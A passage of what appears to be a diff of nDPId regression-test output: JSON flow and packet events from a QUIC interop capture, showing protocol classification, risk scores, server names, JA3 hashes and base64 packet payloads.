QXVeNTIe0oP4s79m2XlQxy5y6O6OOkdY\/eUiYY9ApibduptWlMeUaNEA943We+rSbYXAEwOAraCMgbo\/PxzNUEPSqGnFDmTG9n+KnmYQi\/Alvs3QfYLLJt92WPsYBjHomiJjYWrbbdpMsFSvM2JeGnLfPMCegUq7+rsZIXjLTFB9Be+d9JUJ623MReNEYoMx8+sr6dCv2Gspxsl42k\/5L+7+ZDtFPo3XT6sEDxDYJvaEBjW39mG5b7C2beKtDSKu9M+wzWHdHw90KV7KS6\/DYWbLEkLOhVtsHdqM\/8MkUyr0noHt59IlTRvNBTWfpVdPC4nFiuDekpKBrvN+3EkNvSU3PCcM3kbQrdBSuFh0g28\/mzkqSAv0ZX5bxXIyBY6lC2UEqGMZo8UOe\/BO8r
+hCIJMGZ7nG2fzy\/+YOPtJrO9Mb4J6yQmY0rqVI+EvjNDPprLHMCYe5Q5VOAznPM\/b5ELOgKrzgym72uZNPWn3W6OK4K\/yCjCGoXsltbqumaaP0\/hRyLF6fCMMUuvnes1g8uU+5d9gQLw=="} -01022{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434721,"flow_last_seen":1603816434721,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":50705,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"quic.westus.cloudapp.azure.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01022{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434721,"flow_last_seen":1603816434721,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":50705,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": 
{"client_requested_server_name":"quic.westus.cloudapp.azure.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1603816434722,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":109,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":109,"pkt_l4_len":55,"thread_ts_msec":1603816434722,"pkt":"PKn0qB\/spJGxgjQ5ht1gDhB1ADcRMiYEqIAIAAChAAAAABJ5MAEgAQsHCsnVrqTT\/kdpHoB9EVHHYAA38EDMAAAAAAAIJzYQ4GSWjENRMDQzUTA0NlEwNTD\/AAAb\/wAAHP8AAB3\/AAAe\/wAAHw=="} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1603816434725,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":113,"pkt_l4_len":59,"thread_ts_msec":1603816434725,"pkt":"PKn0qB\/spJGxgjQ5ht1gBLlEADsRMSYAHxgjENIwUQN9nn11N08gAQsHCsnVrqTT\/kdpHoB9EVLLcAA7grWbAAAAAAAI85\/7s6OU42n\/AAAg\/wAAH\/8AAB3\/AAAe\/wAAHP8AABtQQ1ExUENRMMoKiqo="} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434729,"flow_last_seen":1603816434729,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434729,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":41857,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1603816434729,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434729,"pkt":"pJGxgjQ5PKn0qB\/sht1gD9VeBNgRQCABCwcKydWupNP+R2kegH0mBkcAABAAAAAAAABoFggmo4ERUgTYcSTECgoKCghziEmCXfFrHwAARL4b9YC0jUsti7Mc5rxL4bMvXbxsMAL4olVYvjN5PRilW7n4ljBBgiUUpEp6wkwiK5RNAL1DfWrRUra5EMQLYa7yT41ymm1v6KJQRwEqyPeHRFsdBUytKI1rPpS2iH3d+FCzh5\/N6Z35TAJ9TEkCWIk+Ml+SIXBhvhzUmKrkh5gS1558X7aUVr0+OVPR\/OBAJI6M04pwjG\/TaX02ASBnVhuctq1ZReIF0Qlkld94+mqjWxQYB1h\/dpYajowgC\/v5jRQEyHEsjdqTOCfqW28oG8epcCImwCaKkDGkjO6jIwTlSxF6latNrZSmdZRrSDZoCq8uakGSkhQeQD2tbSdbJP3NIbv48WygGXsPWffl9u2ujdRJm\/mhRyLkJCjx5sa5rgRArGikWOTIFjBiZskkStgxHsaKre0OnrY1wLFpG4jthscTHZBq1DL09xjZXEQJ2ar4Dtzgafat7TI9Hfak0NczSvcPxpb3sdfCJrdFt1LLq8mrHti29tt00qMRqTnKUeIkHYHh7EQQ9oqrrtJifM5cuHsdjGPMVxm9ZUD0068DuR7m1j4gZFuCYXIep1D1iLrNXyk77C1SoyXKdL1MFZ598bVXG059RuwlXJhTx+IppuQLvyCWcvMiIipe3POlLLXybFowBGtm+37kvSW6bP+6Bxu21k5BVUZfDmEKQyiqLWLjwhxn3jDb4fTI\/tsSGhcc\/41ZbDNffoTAgxCap8FDnwN9k1QY743o2ZLez7kXEqmuCSqROQE0HUjKczuKGz33rl5rbKMOlfIb\/lA8U1oeAS0Sj3wgBhRgs1SQYzWkBHGDyVcO7BJnrphu3U5D+htX5HpNK\/0e0TAN25zjT+K8nEX\/3DxvwlbRk5wJn+AyZ6JzbbsH\/1G362DzBVBwHYtagkCvON+t57Hc8iE0aTENenXMtwoN6f1B1wYZduiqdYZPniBsQbp7yIJXGHSGCsbl9vCCVYSK6B4mOBmSs59Zd9Zrb7yQCHCnL46xUUYWuW9XHIcs0q\/XTN95d+nDWCaFZa+65E1OkZ2fioJ1I0J\/kglR5x\/pGBhYlVfLXHAZVrrS3NBUMxiwiuXE9YBgC9AX1K\/KCo5PwZac3eUtWl9Wvsqatscy6Zn2neT5yibaTDkcAz+i\/SD6bPG3oO+HswnP0fQu\/hQQV52AAn588lzkI6wOW1Nf2SkEsrPhNqIqbOT+45N1cYw4dXaKydqgziAJcH6frtCv\/BERLWdW5ewDhAVbqZlXbOJGS3oeEiYxUgAGq5frf4Jy9sSj6pAt8NpKzgi1DQyQw+BwQnHXZRD\/HBVXw3jtQ1qbfGSm14e62NKcGoZWqPZ0CTo3qMtWuIR5HUMC7Ai6bto6NZQHe4oCIJdkAxQy1eEp0C4LTqq2dwEQGt8jSA+u5zN3lFYX3qO0vvZJcB6Zk0gu35QWPxA2cbDcDeaDguvChaUcmmEJupLYmfRogah2a2iBSw05H7VN+qBk
y0gky1JC8ev3mlnS6NoFiCW1OUv+s0O3xZXA3kkBnLnMiQ5jYF91oGnVVU63IlOma6Ux58+jDHxiAI7Pk+X2pAFVXwS81L08kdqsBZcYLq9UHGw9rxSOOIc+iP4xlUuEXJrJ2xk2YuBRoQ=="} -01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434729,"flow_last_seen":1603816434729,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434729,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":41857,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"cloudflare-quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434729,"flow_last_seen":1603816434729,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434729,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":41857,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"cloudflare-quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00636{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434729,"flow_last_seen":1603816434729,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434729,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":56073,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02148{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1603816434729,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434729,"pkt":"pJGxgjQ5PKn0qB\/sht1gCGnqBNgRQCABCwcKydWupNP+R2kegH0mBKiACAAAoQAAAAASeTAB2wkBuwTYmHTJCgoKCggVxSlYpn4UkgAARL5ZLsODdf27vLuu6GHs9eSXiVxIAlfs7TcHZcazXn4JE3\/P5JDqe+tOVWQWmWJiN1Zi+QMXxBMeLDuq2FFgXlL2mFN2Y0Hpqzt32q0IcYNEtodCx0cCDcymndGz22NucmhqDhsBTfQYSZ0TGfZ0Y1dj7OIdkztU4UKtQk0Knbx0pPfOb04IoU66JRugmLaY3NcS6\/YWs3i+G\/Z1NaiZhF7wHXHAr7RtRzKLb2gPHbqV9JkwnbYNdieDzqo6OGYxfFJAF9UdpTyC5RofrFHDOiAzzOkMjstRpfIx0da81MZNBFjRQx8VBZVl5cb5VmHHCRKqUJJ\/pimnlqr6\/rH78B0tJyJdMLcbA0k\/GEaMgb2r9k+khrfN+IYPTP9LEK9IyC61PSNuLM7lCBCfjRBxaONHiGk0HUucFiwpQMj72lTAGTUsQa8qFngN+9r0I8HgvmsmOXC4IyatQFicI6JIBY\/\/xLWv+tugw\/qAeO1niZ+nJFTAbwyvKydJ4CrRCQplld36lx1IDKeajrlxvSY4TO7ZlmYtBTR\/QIZQ1n0y7WxFPForSvTZ5L
mkvmQy\/XOIdCHzDT+yu3OG+dlOa05oJSJ5squ1DJvlYS4iSqaRgDu8O1f9s7zQOTQDTlP6inO815rKmw1YpQze+QAPS9Ar8Eh6loMYvm597mpGIaaCjBGmRjM30Y3EWQUMoVmSMYlr+ndlJs0\/parg\/PrflXFNfkn\/Wllw4cvS+JLWNhoBBJwDWpM9YkqIgN6sP6Sf1ACXsEwIhZbB5T3Y+mzlz1fEroyxtSisqFOFlOCB2g0djczdb72gMhUvdB4kROfNLNOm8f4hG1ZnJraoSrQJwgrY+zsLAidSwY62GHtAM9fUNITWGPk7OLfW3OjEbL6sh7ywY+xM+yu0nYlxg0Z8ST6zlbK88Dw9rVrViSQ3Oke1RR\/RShjWSOBcuUxTcA\/eXi5dEcOdrVm6ZsDQ0chPleXisZB4yI9mZgj+jwkM4eFcO6OX8YpKRHpSZrb0SkaAHjgOICK+1d\/ehnzz7M0KNYGDy8XZ08SS3gXJzSNXZLonqI\/bweWJiS+9rlVrB5J5IwRHJDEVN2aAZJbdqAdmcFPCL7XDwYisg0GfcM\/dL5C5xxZS6hZbPHwzwJ6y7r6\/T+A0XWV92UuetwR0QSUywswmbazFGMC\/MBz94jyq\/TrHbvq8OgHad29+CNuQfDZZomN6lJoFhgu1iOIbRwea4vmYiVysTLFxxLhym6vQpFJXvihZGX2xoV1bucff9DyhT5\/Wm8sYVpYS8i2GcM3jWfruzg6rk0SVDY6hf8HFcXkvUJGnDN4KwlwULBiTr9COS06u3di2jUKJqL6FFXM1FtZVzdRf3O\/3GNXJ2HDuA4IlWQXWMcKwj7HbOKOWlf39BkQPYBB\/3CwqDH5TkC7Ny98BmDT6ZzxJIZcSDCUoAZ3M1Es1K7QjuPUiIJlOZZ8vmraAuL1z0zGli+qvbM5O\/6zJbeqSM2M0z0mrGA7v66IfdcHwb0k8mj2tM2aIyHApEXwJPFbWKxWcFb4yW1jdVDOO0dDpGwpl3Ci5EerREPl9RIKJcKdoNqRq0LiqreYf6EOoxrVqsnRGXi8dK3qw4eUScQ=="} -00916{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434729,"flow_last_seen":1603816434729,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434729,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":56073,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"http3-test.litespeedtech.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
+00916{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434729,"flow_last_seen":1603816434729,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434729,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":56073,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"http3-test.litespeedtech.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434736,"flow_last_seen":1603816434736,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434736,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":43645,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1603816434736,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434736,"pkt":"pJGxgjQ5PKn0qB\/sht1gDJNoBNgRQCABCwcKydWupNP+R2kegH0gARnwAAQANAAAAAAAAAABqn0BuwTYttHMCgoKCgiHmjxz9S5+NQAARL60MndZKQNzXHuWbuWII8yYjx1QNcGEa3n\/tA\/kZwZdo0+NMbEhrCvw4fqUesktNwPhDHylUS4gcbEvHHb8Knr61qY95Pm5VKwq10YKtyHKrPUvOt6FFf4EaXlhbjCjP5PNGMuBPWvET6CR\/DNJ3amwoZ8AEiUkCCce2IA0+qLjflDvOu19oZVQSJhyk0ID2QUVFxDX+RIo\/BCEiyqGwrxxtUHNgSlpQhvXLPkd7gs0O8q\/1O3MXjjXw3VV1HTEIvgh9CIZHImqbItBAkHFYhj85297ojhzntlLLEMQUeWyYcLZaQRQLAnNxNHIfLFBwCs6Cttccxk8XUgObPlTQVTnnGvEYXJadvbFnkb5nj0E7bmqr23E\/kns4IXbYRFlEjJZfAc6UWDdSOXBoZHXMIAY\/dztkylxbqayCWGkn8v3wQJvR2xFoTyKE+Pp5saXn2uSt4EYi00Uf6fCGbypDRgDr6HED25efO5iFC99NJvuET7V90ObiIxoji+jOYwIL0BCHSm+uFeO8i7r3GmYR0Qg2iAiX6ZmlOl5gmCd40kAXe9Lo\/pKr3+r853YnPdtRNoIckFL+PsGubjlWj714eDNDRnoSoHs8UNwnNN8sF12pzQsAVr7qLBt4e8KWXFMXfkfIKWSnJhvivGIVrhMeN4RiaQ\/jippacCl0CUjlR9AUDC7DyDOswJ0+eP9X+z1Kkt7EaP13RXwGDeKbPLk\/tVc3ZXQShkobo74qelkPT7nbFmTZB78n2grmfmy0C6HMQ+qUHKH\/MfqCCK2ZnmHVM8veaHwzWHFJ4gVd2h5wLXlBRQqCB2AZzoyKpcMZFNpfGh+rTCIwQTyVZzycWPvtrbHzPNg+tUe1i\/foBt0+XApuoCCwHOsgf9nS7IFS3h97hfCh2TYTKBM6t9C3VPFYDuKYfUjriuP3G2Eq7sMAiqBDef1fYGxLN\/Dys1ZS2B2n+Zqt6K1diQtrzsIwKlRRg+XjfSSzPOVrKeXYenyNePWIMOs4YVAyvkFPV4RM\/osDQvZvShUA0iRuuMPCsj024c7WYx9lDihj4EJBymWsIkTQg0x6rfvVrFojeVlS8zgiytvfAIJsOr+k34t3NbLaK0YyfFcVKBnFDiEC5OcAMd0yi6ouvtE9rJyb\/CiH+Vtx9OSGkbowLLyCHtZ1EUgA0\/vr\/mU+ea4hE\/dLdDDjWwxrJg1oKjnYeHQvIDUT0MVaXTlMXS7\/F6HA7\/5QTayU5MU3hKtpwhACAx5gHHhue3iTscqXigKQ7oiaLOdxRIJ2wKmzNzvQPCG5UmOLnsbM\/3lI+SzzLjMM5HxKsnb7yJmS6z2+tdEoxPOa5ZNm7Wc1LoGgLZd+x+V88MeQDFaBDMQHNWCS8z7Ruv7Q8Jc\/JKShee1avRiWD+QjKfpjPULJzGhq8IhO+3xUZoq\/xSnX5PQ7xqYQY3oim9xsL+ADJPPe0oE2O\/lbNfbGhouInwUUVqU
mdk\/fion2o\/ylxCHaGoB6j8tJgJq8ystdV8ErJCcEhkKohD7qeUu1YL\/exHAdFqCo5yGAJyVZFmJD6CkMOCvG195MdsDa2WfPCN+fs1Twy5bRnpAdq\/aOqOWkb9sVtpRcByoK+nPaUgcYcmBQw=="} -00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434736,"flow_last_seen":1603816434736,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434736,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":43645,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.rocks","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434736,"flow_last_seen":1603816434736,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434736,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":43645,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.rocks","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
02141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1603816434738,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434738,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUA8ydAAEARtHzAqAGAwb4KYucjEVEE7P8dwwoKCgoIOPxKwZ+D2JAAAETSb9UlQE89ABeQeI\/QpsT81kvbf+yGJkDFJiGPzWvy81KCH2cJiDSPisJ1QnX5xtmzBkvUHRp2FuQGYa\/pilZqNP70VReX07WlD\/pZQJVCbigdcxMaEYZASHVRfutuRBKJAqHBAwLkNLD3Z3I0ZaHCqcS9KYzw98tkCokzq6mDpHzHtf6ExbYo4N0cIacCNvdP+KsCtrUQL5WlJ9CyKBD242cIc5CKdLYQTld3qevU3UaqfhVdl5eNkntpOfIkomDk06sEpzJqxU7qHCvJeRN5m5L79zL+gTeIyE9Asm2jjoxtsNgfImDjEtUQxGhWbcpzrh3DpfCal+\/Lh3\/9pzSQhk5oc7WisaXX4PMLYNl+D\/m52ZU0UFUhE0+l9n3VSr0dkOaUEe35MHeuokXZgwXZNMBFC5igXXlE8UTLsi0ue8JTTCNLCTt+A2z1dpM8DEqH3biH+qPKj7JaqT0dHO+FKOdg2AM+f4RwN8QCF26RT62FuMBNmyc7aD4PDQPxUCYmRi0UGMYomOoMy8hZ\/jdhA0wX+8Om3VVga0TGy7NSDrerhKL7+YEsof035rdtPH0Y3j599QoVaO64ZA3v+T3u\/PfqnGSNilFgI9flDp09Oakd9oM2lrpaAWLKUI\/yiWEn06khwuxYpdaA+jHlJRUxbcAtBcEA7Cj1DsLuovsIWklWe2vDb5Co0vAUw5gsM+5gFIyui6IYAnMYEgYAo0c5k8aJzc1BMlQVQ3DaV0O66JJgt45uH5jizP8oxu2Wh52E9LT2KVQJhcHClILWv+P8RGxhrIU6t17U1LVUVBWrmKV60at1NW+rS5XSlF37anegq12p4\/NuoM\/YA2qu2AGPkJxiKmaQkbUvxD27zSetz4qW8RHM7iubRGqfzIBqjSpWnrxid4CaaVVEodx37MBRM60oKdEd8diMaexoLpCHpXy9\/9K2ILLllW9BNa9VJqdBFl\/PG2+3KXrSPTzMih\/0LgFxzrGSKn0cLTERd6NQOkq4kYFwu05o3XKSFMJCrrKttzDQOD0Xxkg+EwHHOHzZmUPRCHUL9xhPxEJdnU1P\/3DLDZMnviROzqkxPMEGYvrPbBWkCovwDH0\/6kXKJUwTNn4cbIQkW\/t2p9CS7lBLRdj+DcuKY4rzac0WcEfT58KRBSZN+EEOJ8ox4ywybHsEVQIhRgiC6M8tZ0Xtu+jwmRkD7RXtD4ivQRzZZrdRaM7+tfWpzYQViq1cUl0HobKvf8BQLMQNaUHuCe2x0spprn6wrhwmhtFLZM\/3JUQaheNThydzrhRsBxsueLLPS2wSHRf5YbXUOfqKT8x1ZUxl1Cu9Q2MBtIfuiHdJowbL58DK14UHd5YMvnZi5fDRxVUztKDIVYQMqMKH8yV9xD3VGPyIiH8IGHHs5mHayhzBKpOTDNSJvoWCwUSiT09RuRXMK392nYlXWcB1GHTIFJkC8XToE5ImQ07hzYbIBq2ramFYEZ541ak4WuKuC31\/KEs2j8jC9NQ9YUqFgE
BERIZrXwnuyNqHXFfcqkiJHQ96OMVEUoO+dD1RwDoPZlAiSL6Y0xKWblqIJeilsDd4MRdVKt2kHPj3frisO3sEnc1o4dW8rgPCUUWuyR+3XiwvLjWNq9104NxX8nzAm\/FnVOMJuAoC5Q=="} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434743,"flow_last_seen":1603816434743,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434743,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":48644,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1603816434743,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434743,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAbxtAAEARaETAqAGAg58Yxr4EEVIE7BzKwgoKCgoIBzLrVZ9ibJ4AAETSpSIYhDhoiEFvP1qBCfMoU\/4qjpQbb9U7jdmFrc8viSpjQA7eDSIQICGT\/pnAELg3vnpeBC5hTrSAg5y0v3Nvj85YCDRYDUNtZg\/gqc9lMinrr2qy\/+tACJsh9TULiMkhVXBS\/DnqCBfVla2xKSlWGVYDfxfjWPLOnhjK4tuRvdsBg38QhZovgQwbE74gpeM+C0l1yF